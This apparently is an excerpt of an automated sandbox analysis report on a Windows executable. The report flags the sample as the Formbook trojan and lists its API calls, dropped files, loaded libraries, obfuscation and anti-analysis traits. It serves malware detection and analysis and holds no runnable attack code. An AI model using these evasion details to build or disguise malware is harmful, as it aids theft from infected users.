Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36050EAD
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F9AD00
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FB8CDF
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605EFBF
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FAAC20
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F90C12
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA6FE0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3601EC20
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3604EC4C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605EC60
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36056C69
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3606ACEB
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FACF00
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F92EE8
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FC0E50
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FE2E48
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605CA13
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F9E9A0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605EA5B
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA28C0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FB6882
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F86868
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36014BC0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FCE810
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36040835
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA0B10
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605E9A6
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C8D778
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C8E70F
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C8E374
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C8E258
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C9520C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C8D778
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C8E70F
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C8E374
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C8E258
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C9520C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CED778
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CEE374
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CEE70F
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CEE258
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CF520C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: String function: 3601EF10 appears 105 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: String function: 35FE7BE4 appears 96 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: String function: 35F8B910 appears 272 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: String function: 3600E692 appears 86 times
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: String function: 35FD5050 appears 37 times
      Source: LkzvfB4VFj.exe Static PE information: invalid certificate
      Source: LkzvfB4VFj.exe, 00000000.00000000.91614078953.0000000000458000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035D16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000000.92668485631.0000000000458000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035ED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000036230000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs LkzvfB4VFj.exe
      Source: LkzvfB4VFj.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: classification engine Classification label: mal100.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe File created: C:\Users\user\tranchet
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe File created: C:\Users\user\AppData\Local\Temp\nse8818.tmp
      Source: LkzvfB4VFj.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: LkzvfB4VFj.exe ReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe File read: C:\Users\user\Desktop\LkzvfB4VFj.exe
      Source: unknown Process created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Process created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Process created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: wkscli.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Arder.lnk.0.dr LNK file: ..\Users\user\Disannex.And37
      Source: LkzvfB4VFj.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: LkzvfB4VFj.exe, LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara match File source: 00000000.00000002.92764803526.0000000005D64000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_6FEB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_6FEB2F60 push eax; ret 0_2_6FEB2F8E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35F908CD push ecx; mov dword ptr [esp], ecx 3_2_35F908D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C845F7 pushfd ; ret 3_2_05C845F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C84487 push ebp; ret 3_2_05C84493
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C844B7 pushfd ; ret 3_2_05C844B8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C846B5 push FFFFFF93h; iretd 3_2_05C846C2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C860CB push ds; ret 3_2_05C860D4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C95052 push eax; ret 3_2_05C95054
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C8D248 push ss; retf 3_2_05C8D256
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C86B64 push ebx; iretd 3_2_05C86B65
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C84B66 push esp; ret 3_2_05C84B67
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C90B05 push ebp; iretd 3_2_05C90B14
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_05C8AA5B push esi; retf 3_2_05C8AA61
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C845F7 pushfd ; ret 3_2_35C845F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C84487 push ebp; ret 3_2_35C84493
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C844B7 pushfd ; ret 3_2_35C844B8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C846B5 push FFFFFF93h; iretd 3_2_35C846C2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C860CB push ds; ret 3_2_35C860D4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C95052 push eax; ret 3_2_35C95054
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C86B64 push ebx; iretd 3_2_35C86B65
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C84B66 push esp; ret 3_2_35C84B67
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C90B05 push ebp; iretd 3_2_35C90B14
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C8D248 push ss; retf 3_2_35C8D256
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35C8AA5B push esi; retf 3_2_35C8AA61
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35CE45F7 pushfd ; ret 3_2_35CE45F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35CE60CB push ds; ret 3_2_35CE60D4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35CE4487 push ebp; ret 3_2_35CE4493
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35CE44B7 pushfd ; ret 3_2_35CE44B8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35CF5052 push eax; ret 3_2_35CF5054
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35CE4B66 push esp; ret 3_2_35CE4B67
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35CE6B64 push ebx; iretd 3_2_35CE6B65
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe File created: C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Process information set: NOOPENFILEERRORBOX (120 identical entries)

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API/Special instruction interceptor: Address: 5E40C68
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API/Special instruction interceptor: Address: 4A70C68
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API/Special instruction interceptor: Address: 7FFA20B90594
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API/Special instruction interceptor: Address: 7FFA20B8FF74
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API/Special instruction interceptor: Address: 7FFA20B8D6C4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API/Special instruction interceptor: Address: 7FFA20B8D864
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35FD1763 rdtsc
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API coverage: 0.3 %
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_0040646B FindFirstFileA,FindClose
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_004027A1 FindFirstFileA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
      Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
      Source: LkzvfB4VFj.exe, 00000003.00000003.93042110969.0000000005D91000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005D91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API call chain: ExitProcess graph end node graph_0-4154
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe API call chain: ExitProcess graph end node graph_0-3977
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35FD1763 rdtsc
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35FD34E0 NtCreateMutant,LdrInitializeThunk
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 0_2_6FEB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_36019603 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_3604F607 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_36023608 mov eax, dword ptr fs:[00000030h] (6 occurrences in this function)
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35FC15EF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_35F9B5E0 mov eax, dword ptr fs:[00000030h] (6 occurrences in this function)
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_3603D62C mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exe Code function: 3_2_3603D62C mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603D62C mov eax, dword ptr fs:[00000030h]3_2_3603D62C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025660 mov eax, dword ptr fs:[00000030h]3_2_36025660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601166E mov eax, dword ptr fs:[00000030h]3_2_3601166E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601166E mov eax, dword ptr fs:[00000030h]3_2_3601166E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601166E mov eax, dword ptr fs:[00000030h]3_2_3601166E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC9580 mov eax, dword ptr fs:[00000030h]3_2_35FC9580
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC9580 mov eax, dword ptr fs:[00000030h]3_2_35FC9580
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F68C mov eax, dword ptr fs:[00000030h]3_2_3604F68C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600D69D mov eax, dword ptr fs:[00000030h]3_2_3600D69D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8753F mov eax, dword ptr fs:[00000030h]3_2_35F8753F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8753F mov eax, dword ptr fs:[00000030h]3_2_35F8753F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8753F mov eax, dword ptr fs:[00000030h]3_2_35F8753F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93536 mov eax, dword ptr fs:[00000030h]3_2_35F93536
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93536 mov eax, dword ptr fs:[00000030h]3_2_35F93536
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC1527 mov eax, dword ptr fs:[00000030h]3_2_35FC1527
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCF523 mov eax, dword ptr fs:[00000030h]3_2_35FCF523
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360256E0 mov eax, dword ptr fs:[00000030h]3_2_360256E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360256E0 mov eax, dword ptr fs:[00000030h]3_2_360256E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B502 mov eax, dword ptr fs:[00000030h]3_2_35F8B502
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB94FA mov eax, dword ptr fs:[00000030h]3_2_35FB94FA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605970B mov eax, dword ptr fs:[00000030h]3_2_3605970B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605970B mov eax, dword ptr fs:[00000030h]3_2_3605970B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F717 mov eax, dword ptr fs:[00000030h]3_2_3604F717
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC54E0 mov eax, dword ptr fs:[00000030h]3_2_35FC54E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
